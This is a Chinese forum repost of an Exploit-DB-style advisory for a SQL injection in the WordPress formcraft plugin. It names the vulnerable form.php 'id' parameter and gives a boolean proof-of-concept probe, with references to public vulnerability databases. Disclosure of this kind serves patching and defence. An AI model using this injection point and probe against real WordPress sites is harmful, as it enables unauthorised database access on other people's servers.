Moke|墨客

 找回密码
 立即注册
搜索
查看: 6465|回复: 0

WordPress插件formcraft Sql注射

[复制链接]

3636

主题

0

回帖

3681

积分

超级版主

Rank: 8Rank: 8

积分
3681
发表于 2016-5-12 18:16:32 | 显示全部楼层 |阅读模式






                   #标题 : WordPress formcraft Plugin Sql Injection
  #
  # 作者: Ashiyane Digital Security Team
  #
  #软件下载: www.wordpress.org
  #
  # 测试环境: Windows , Linux
  #
  #漏洞 : Sql Injection
  #
  # Location1:
  [Target]/wp-content/plugins/formcraft/form.php?id=[Sql]
  #
  #
  #
  # Exploit-DB Note:
  # A PoC: form.php?id=1%20and%20 1=1
  Milad Hacking
  We Love Mohammad
  References:
  http://xforce.iss.net/xforce/xfdb/89581
  http://www.securityfocus.com/bid/64183
  http://www.exploit-db.com/exploits/30002
  http://secunia.com/advisories/56044
  http://packetstormsecurity.com/files/124343/wpformcraft-sql.txt
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

 

 

快速回复 返回顶部 返回列表